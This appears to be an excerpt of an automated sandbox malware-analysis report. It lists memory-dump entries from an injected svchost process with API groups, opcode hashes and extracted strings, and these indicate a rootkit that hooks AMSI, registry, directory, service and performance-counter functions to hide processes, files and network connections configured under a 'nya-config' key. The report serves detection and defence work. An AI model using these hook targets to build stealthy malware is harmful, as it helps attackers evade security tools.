                                                                      • Instruction Fuzzy Hash: 9DB18F32212E9C86FB669FAAD5207E9A3E6F745B84F445016EE49A3F94DF35CC80C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: 4873ab1377631ed3b5f642209de13ce363605dc6f49551d8c78314de9a13edb2
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: 12313A72305F8086EB619FE0E8643ED73A6F785749F44402ADA4E57B94DF38D548C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: 839d25c3ad72a351675eb302e06987ece0838a490c36857a67cbe2bbbb68fbe8
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: 4C314D76205F808AEB618FA4E8A03EE73E5F785748F44442ADA4E57B98DF78C648C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: ca55ca207916cb9fbcffb1604f6be81213e2bc2e383c54733c27bd12b3e734fd
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: 95416C36314F8086EB61CFA4E8513EE77A6F789754F500115EA8D57BA8DF38C559CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: 4935540b7b4c0bed928b046f01ff0cc318abf1098679f9b93d6a2f4bad31146a
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: 91416C36214F8086EB61CF69E8503EE73E5F789798F500225EA8D57B98DF78C559CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 9fce71c9a29af2153e04d3c8ac59f81a753fc28d7b0045cb35c7bbb718930c7b
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: 1DA1E632704F8049FB22DBF594A13FD6BE3E781B98F544115DA9937AA9CA38D44BE700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 1f9ae77d44ffdda734c7c92040a980be7ef4117f9762ba0efd2a7da8fe2ece25
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: 0DA1F832705E84C9FB229BFAD8A03ED6BE2E781794F144116DE99F7E99DA78C441C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: bb14bdb563abb96b09d7b5ebf23ced4e8d4917718ad85786fdb87d6f3c9e7613
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: 19712776710F1485EB22DFE1E8A16EC33A6FB99B89F441112DE4E63B28DE38D449D340

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: 97e7a92b98bbf8ab3f417e885f16f1c5c92645046321fbf9193d7dc8724b8e5f
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: BB714D36311E5486EB219FAAE860BDC23E6FB89B89F405111DE4EA7F68EF34C444C350

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 9f14184b953213554cc87f29641866dcf7eaac0ef6360da18791f94a30c2e7d3
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: F051AEB4790E4AA5EB03EFE4EC727E463A3B795345FC40513A409B2561DE38A25FE384

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: dca91009f5b6c3f2e5717fe52d00770d2190f70ac6976afee63b6a984da106b4
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: 00515A72310B849AE762CFA2E8693AA77E3F789F99F444124DE4917718DF38D04A9700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: f8f13489960f951edd332fd126e8a9159bb7fd1435c66fd568b93207f930b5f5
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: C8517D32201F849AE721CFA6E46879A77E2F789F99F444124DE8A57B18DF7CC049CB10

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: dec67ef8ba282fc86257733b78379fbe83c4263940246cd14987be4d190be04e
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: F9518B31701F0451EB17DBE6A8213E922D2AB99BB0F5807259E3D673D0EF38E44AA750

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: f3272709e7377aa56bcab629b0f4fd3e97f839f10e7653b33cfe26bb6b53a4e5
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 1451B435702F0851EB169B9AE8203E523E2BB49BB1F4847259D3EA7BC4DF38C449C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: 7d2a1bd9338de5041769bb6f010ffff08f086095355e4c008bee6e442592cdae
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 8731AE32B04F4096E723CFD2A8147A9B3E2F798BD5F4405299E49A3A24DF38E45AD740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: 23c13c2ddbe498f8b91da9e5c8de495e8af333af9e169da25c5b797211c4f684
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 3931F232A00F4897F722DF96A8587D9A3E2F788BC5F440525DE4AA3F24EF78C4568340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 02310675b14882a9f38c52dff3f2035dc3487fd213dcf45e48caa12156e258ff
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: DB31A071B10F018AE753EFE6A8647A973E3B794F85F4440249E4A63724DE38E44AE700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 628014668acd7ca6cad3ba2be0a6b098e9f2cde72bc6ffd802b3807a3aac84b2
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: 1431B131611F498AFB12DFA6A8A479973E2FB84FD4F444125DE4AA3B24EF38D441C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: f333d004c4201acad5f0095d6518f9af5d46922d673cb5da6890ded6a890a167
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: 17D18072704F808AEB22DBE5E4623ED77E2F755798F100115EA8D67B96CB34E48AD700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
